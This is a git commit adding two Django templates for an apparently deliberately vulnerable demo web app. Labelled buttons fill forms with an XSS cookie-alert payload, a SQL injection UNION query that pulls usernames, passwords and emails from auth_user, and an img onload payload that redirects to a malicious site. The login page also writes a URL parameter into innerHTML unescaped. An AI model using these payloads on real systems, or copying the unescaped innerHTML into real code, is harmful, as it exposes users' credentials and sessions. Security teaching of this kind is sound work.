Initial implementation
This commit is contained in:
45
project1/templates/index.html
Normal file
45
project1/templates/index.html
Normal file
@@ -0,0 +1,45 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<body>
|
||||
<p>
|
||||
<form method="POST" action="/add_product">
|
||||
{% csrf_token %}
|
||||
<label>Add product:</label><br>
|
||||
<input id="add_product" name="name" type="text" />
|
||||
<button type="submit">Submit</button>
|
||||
<a href="#" onClick="xss_inject_attack()">XSS injection attack (steal cookies)</a>
|
||||
</form>
|
||||
</p>
|
||||
<p>
|
||||
<form method="GET" action="/find_product">
|
||||
<label>Find Product by Name</label><br/>
|
||||
<input id="find_product_by_name" name="name" type="text" />
|
||||
<button type="submit ">Search</button>
|
||||
<a href="#" onClick="sql_inject_attack()">Sql injection attack (Get all users of system along with their details)</a>
|
||||
</form>
|
||||
</p>
|
||||
<p>
|
||||
<form method="POST" action="/import_products" enctype="multipart/form-data">
|
||||
{% csrf_token %}
|
||||
<label for="file">Import Products (XML):</label><br>
|
||||
<input name="file" type="file" />
|
||||
<button type="submit ">Submit</button>
|
||||
</form>
|
||||
</p>
|
||||
|
||||
<a href="/logout">Log out</a>
|
||||
|
||||
<script>
|
||||
function xss_inject_attack() {
|
||||
document.querySelector("#add_product").value = "<script>alert('I got your cookie, ha-haa!')</scr" + "ipt>";
|
||||
}
|
||||
|
||||
function sql_inject_attack() {
|
||||
document.querySelector("#find_product_by_name").value = "' AND false UNION ALL select id, username||' '||password||' '||first_name||''||last_name||' '||email from auth_user where username like '";
|
||||
}
|
||||
</script>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
||||
23
project1/templates/login.html
Normal file
23
project1/templates/login.html
Normal file
@@ -0,0 +1,23 @@
|
||||
<h2>Log In</h2>
|
||||
<form method="GET" action="do_login">
|
||||
<label for="username">Username:</label>
|
||||
<input id="username" type="text" name="username" /><a href="#" onclick="xss_inject()">XSS injection attack (site redirect)</a><br/>
|
||||
<label for="password">Password:</label>
|
||||
<input type="password" name="password" /><br/>
|
||||
<button type="submit">Log In</button>
|
||||
|
||||
<div style="color:red" id=message></div>
|
||||
|
||||
<script>
|
||||
function xss_inject() {
|
||||
var img = "https://www.freepnglogos.com/uploads/hacker-png/hacker-interpol-arrests-suspected-anonymous-hackers-motley-5.png";
|
||||
document.querySelector("#username").value = `<img src="${img}" onload="window.location.href='http://some.malicious.site.com';this.parentNode.removeChild(this);"/>`;
|
||||
}
|
||||
parameters = new URLSearchParams(window.location.search);
|
||||
if (parameters.get('message')) {
|
||||
message = decodeURIComponent(parameters.get('message'));
|
||||
console.log(message);
|
||||
document.querySelector("#message").innerHTML = message;
|
||||
}
|
||||
</script>
|
||||
</form>
|
||||
Reference in New Issue
Block a user